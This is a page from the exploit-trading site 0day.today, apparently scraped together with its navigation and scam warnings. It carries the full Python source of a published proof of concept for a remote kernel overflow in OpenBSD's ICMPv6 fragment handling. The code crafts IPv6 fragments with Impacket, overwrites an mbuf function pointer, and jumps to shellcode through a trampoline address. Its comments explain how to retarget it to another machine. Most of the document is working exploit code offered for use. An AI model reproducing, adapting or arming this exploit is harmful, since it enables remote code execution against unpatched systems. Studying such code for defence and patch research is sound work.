0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OpenBSD ICMPv6 Fragment Remote Execution Exploit PoC
==================================================== OpenBSD ICMPv6 Fragment Remote Execution Exploit PoC ==================================================== # The PoC executes the shellcode (int 3) and returns. It overwrites the # ext_free() function pointer on the mbuf and forces a m_freem() on the # overflowed packet. # # The Impacket library is used to craft and send packets # (http://oss.coresecurity.com/projects/impacket.html or download from # Debian repositories) # # Currently, only systems supporting raw sockets and the PF_PACKET family # can run the included proof-of-concept code. # # Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct # 30" # # To use the code to test a custom machine you will need to: 1) Adjust the # MACADDRESS variable 2) Find the right trampoline value for your system # and replace it in the code. To find a proper trampoline value use the # following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the # ICMP checksum # # The exploit should stop on an int 3 and pressing "c" in ddb the kernel # will continue normally. # # # Description: # OpenBSD ICMPv6 fragment remote execution PoC # # Author: # Alfredo Ortega # Mario Vilas # # Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc. # All rights reserved from impacket import ImpactPacket import struct import socket import time class BSD_ICMPv6_Remote_BO: MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f) def Run(self): self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) self.s.bind(('eth0',0x86dd)) sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP) validIcmp = self.buildValidICMPPacket(sourceIP,destIP) for i in range(100): # fill mbufs self.sendpacket(firstFragment) self.sendpacket(validIcmp) time.sleep(0.01) for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable self.sendpacket(secondFragment) time.sleep(0.1) self.sendpacket(firstFragment) self.sendpacket(validIcmp) time.sleep(0.1) def sendpacket(self, data): ipe = ImpactPacket.Ethernet() ipe.set_ether_dhost(self.MACADDRESS) ipd = ImpactPacket.Data(data) ipd.ethertype = 0x86dd # Ethertype for IPv6 ipe.contains(ipd) p = ipe.get_packet() self.s.send(p) def buildOpenBSDPackets(self,sourceIP,destIP): HopByHopLenght= 1 IPv6FragmentationHeader = '' IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop) IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id IPv6HopByHopHeader = '' IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP) IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D ) IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader) print longitud IPv6Packet = '' IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += '\x00' # next header (2c: Fragmentation) IPv6Packet += '\x40' # hop limit IPv6Packet += sourceIP IPv6Packet += destIP firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150) self.ShellCode = '' self.ShellCode += '\xcc' # int 3 self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret ICMPv6Packet = '' ICMPv6Packet += '\x80' # type (128 == Icmp echo request) ICMPv6Packet += '\x00' # code ICMPv6Packet += '\xfb\x4e' # checksum ICMPv6Packet += '\x33\xf6' # ID ICMPv6Packet += '\x00\x00' # sequence ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode # Start of the next mfub (we land here): ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB' # mbuf+0x20: trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp") ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG' longitud = len(ICMPv6Packet) IPv6Packet = '' IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += '\x2c' # next header (2c: Fragmentation) IPv6Packet += '\x40' # hop limit IPv6Packet += sourceIP IPv6Packet += destIP IPv6FragmentationHeader = '' IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6) IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet return firstFragment, secondFragment def buildValidICMPPacket(self,sourceIP,destIP): ICMPv6Packet = '' ICMPv6Packet += '\x80' # type (128 == Icmp echo request) ICMPv6Packet += '\x00' # code ICMPv6Packet += '\xcb\xc4' # checksum ICMPv6Packet += '\x33\xf6' # ID ICMPv6Packet += '\x00\x00' # sequence ICMPv6Packet += 'T'*1232 longitud = len(ICMPv6Packet) IPv6Packet = '' IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += '\x3A' # next header (2c: Fragmentation) IPv6Packet += '\x40' # hop limit IPv6Packet += sourceIP IPv6Packet += destIP icmpPacket = IPv6Packet+ICMPv6Packet return icmpPacket attack = BSD_ICMPv6_Remote_BO() attack.Run() # 0day.today [2024-09-28] #